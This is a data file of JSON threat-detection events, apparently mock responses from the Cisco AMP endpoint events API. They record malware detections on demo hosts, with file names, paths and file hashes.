-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":680000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261637","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":665000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261636","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":509000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261635","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259028591575000,"timestamp":1610705845,"timestamp_nanoseconds":984000000,"date":"2021-01-15T10:17:25+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259028591575130","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251439135752000,"timestamp":1610705841,"timestamp_nanoseconds":455000000,"date":"2021-01-15T10:17:21+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251439135752194","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258981346935000,"timestamp":1610705834,"timestamp_nanoseconds":346000000,"date":"2021-01-15T10:17:14+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258981346934873","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258929807327000,"timestamp":1610705822,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:02+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258929807327320","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":470000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542427","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":112000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":71000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542425","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":532000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":454000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667841684537366","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":80000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537365","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258118058508000,"timestamp":1610705633,"timestamp_nanoseconds":636000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258118058508361","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667837389570000,"timestamp":1610705633,"timestamp_nanoseconds":689000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667837389570068","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258066518901000,"timestamp":1610705621,"timestamp_nanoseconds":608000000,"date":"2021-01-15T10:13:41+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258066518900808","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258014979293000,"timestamp":1610705609,"timestamp_nanoseconds":581000000,"date":"2021-01-15T10:13:29+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258014979293255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257963439686000,"timestamp":1610705597,"timestamp_nanoseconds":569000000,"date":"2021-01-15T10:13:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257963439685702","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":778000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667579691532307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":747000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532306","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":371000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532305","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667575396565000,"timestamp":1610705572,"timestamp_nanoseconds":971000000,"date":"2021-01-15T10:12:52+00:00","event_type":"Threat 
